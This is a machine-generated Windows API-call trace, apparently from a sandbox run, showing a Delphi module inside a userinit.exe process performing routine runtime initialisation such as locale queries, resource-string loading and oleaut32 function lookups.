[0189.467] GlobalUnlock (hMem=0x68000c) returned 0
[0189.468] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10a000, uFlags=0x2) returned 0x68000c
[0189.485] GlobalLock (hMem=0x68000c) returned 0xb10020
[0189.486] GlobalHandle (pMem=0xb10020) returned 0x68000c
[0189.486] GlobalUnlock (hMem=0x68000c) returned 0
[0189.486] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10c000, uFlags=0x2) returned 0x68000c
[0189.550] GlobalLock (hMem=0x68000c) returned 0x2830020
[0189.551] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0xb10000
[0189.551] VirtualAlloc (lpAddress=0xb10000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0xb10000
[0189.628] GetKeyboardType (nTypeFlag=0) returned 4
[0189.628] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0189.628] GetStartupInfoA (in: lpStartupInfo=0x12f4e0 | out: lpStartupInfo=0x12f4e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0189.628] GetVersion () returned 0x1db10106
[0189.628] GetVersion () returned 0x1db10106
[0189.628] GetCurrentThreadId () returned 0x5a8
[0189.628] GetModuleFileNameA (in: hModule=0x2940000, lpFilename=0x12efdc, nSize=0x105 | out: lpFilename="\xec\xef\x12" (normalized: "c:\\windows\\system32\\ìï\x12")) returned 0x0
[0189.628] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12eeb7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.628] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12efcc | out: phkResult=0x12efcc*=0x0) returned 0x2
[0189.628] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12efcc | out: phkResult=0x12efcc*=0x0) returned 0x2
[0189.629] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12efcc | out: phkResult=0x12efcc*=0x0) returned 0x2
[0189.629] lstrcpynA (in: lpString1=0x12eeb7, lpString2="\xec\xef\x12", iMaxLength=261 | out: lpString1="\xec\xef\x12") returned="\xec\xef\x12"
[0189.629] GetThreadLocale () returned 0x409
[0189.629] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x12efc7, cchData=5 | out: lpLCData="ENU") returned 4
[0189.629] lstrlenA (lpString="\xec\xef\x12") returned 3
[0189.629] LoadStringA (in: hInstance=0x2940000, uID=0xffc4, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0189.629] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2edcc0
[0189.629] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a60000
[0189.629] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2eecc0
[0189.629] VirtualAlloc (lpAddress=0x2a60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a60000
[0189.629] LoadStringA (in: hInstance=0x2940000, uID=0xffc3, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0189.629] LoadStringA (in: hInstance=0x2940000, uID=0xffc1, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffc2, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffd4, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffdd, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffd3, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffd0, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffd7, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffd6, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe8, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe9, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffea, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe7, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe5, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe3, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe2, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe1, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe0, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffff, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfffe, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfffd, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfffc, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfffb, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfffa, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfff9, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfff8, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfff7, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfff6, lpBuffer=0x12f100, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xfff4, lpBuffer=0x12f0ec, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0189.630] LoadStringA (in: hInstance=0x2940000, uID=0xffe4, lpBuffer=0x12f0ec, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0189.630] GetVersionExA (in: lpVersionInformation=0x12f484*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2940000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x94\x02·\"\x94\x02\x1cõ\x12") | out: lpVersionInformation=0x12f484*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0189.630] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0189.630] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0189.630] GetThreadLocale () returned 0x409
[0189.630] GetThreadLocale () returned 0x409
[0189.630] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Jan") returned 4
[0189.630] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x12f35c, cchData=256 | out: lpLCData="January") returned 8
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Feb") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x12f35c, cchData=256 | out: lpLCData="February") returned 9
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Mar") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f35c, cchData=256 | out: lpLCData="March") returned 6
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Apr") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f35c, cchData=256 | out: lpLCData="April") returned 6
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x12f35c, cchData=256 | out: lpLCData="May") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f35c, cchData=256 | out: lpLCData="May") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Jun") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f35c, cchData=256 | out: lpLCData="June") returned 5
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Jul") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f35c, cchData=256 | out: lpLCData="July") returned 5
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Aug") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f35c, cchData=256 | out: lpLCData="August") returned 7
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Sep") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x12f35c, cchData=256 | out: lpLCData="September") returned 10
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Oct") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x12f35c, cchData=256 | out: lpLCData="October") returned 8
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Nov") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x12f35c, cchData=256 | out: lpLCData="November") returned 9
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Dec") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x12f35c, cchData=256 | out: lpLCData="December") returned 9
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Sun") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Sunday") returned 7
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Mon") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Monday") returned 7
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Tue") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Wed") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Thu") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Thursday") returned 9
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Fri") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Friday") returned 7
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Sat") returned 4
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f35c, cchData=256 | out: lpLCData="Saturday") returned 9
[0189.631] GetThreadLocale () returned 0x409
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="$") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="0") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="0") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x12f4b0, cchData=2 | out: lpLCData=",") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x12f4b0, cchData=2 | out: lpLCData=".") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="2") returned 2
[0189.631] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x12f4b0, cchData=2 | out: lpLCData="/") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0189.632] GetThreadLocale () returned 0x409
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f384, cchData=256 | out: lpLCData="1") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0189.632] GetThreadLocale () returned 0x409
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f384, cchData=256 | out: lpLCData="1") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x12f4b0, cchData=2 | out: lpLCData=":") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="AM") returned 3
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="PM") returned 3
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="0") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="0") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f3b8, cchData=256 | out: lpLCData="0") returned 2
[0189.632] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x12f4b0, cchData=2 | out: lpLCData=",") returned 2
[0189.632] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0189.632] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0189.633] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0189.634] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0189.634] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0189.634] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0189.634] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0189.634] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0189.634] GetDC (hWnd=0x0) returned 0x68010872
[0189.634] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0189.634] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0189.634] GetDC (hWnd=0x0) returned 0x68010872
[0189.634] GetDeviceCaps (hdc=0x68010872, index=104) returned 0
[0189.634] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0189.634] CreatePalette (plpal=0x12f114) returned 0x8508085b
[0189.634] GetStockObject (i=7) returned 0x1b00017
[0189.634] GetStockObject (i=5) returned 0x1900015
[0189.634] GetStockObject (i=13) returned 0x18a002e
[0189.634] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0189.634] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff3d, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff3c, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff3b, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff3a, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff39, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff38, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff37, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff36, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff35, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff34, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff33, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff32, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff31, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff30, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff4f, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff4e, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff4d, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xff4c, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0189.635] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0189.635] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0189.635] GetCurrentThreadId () returned 0x5a8
[0189.635] GlobalAddAtomA (lpString="WndProcPtr02940000000005A8") returned 0xc0f5
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xfefc, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0189.635] LoadStringA (in: hInstance=0x2940000, uID=0xfefb, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfefa, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef9, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef8, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef7, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef6, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef5, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef4, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef3, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef2, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef1, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xfef0, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0f, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0e, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0d, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0c, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0b, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff0a, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff09, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff08, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff07, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff06, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff05, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff04, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff03, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff02, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff01, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff00, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1f, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1e, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1d, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1c, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0189.636] LoadStringA (in: hInstance=0x2940000, uID=0xff1b, lpBuffer=0x12f110, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
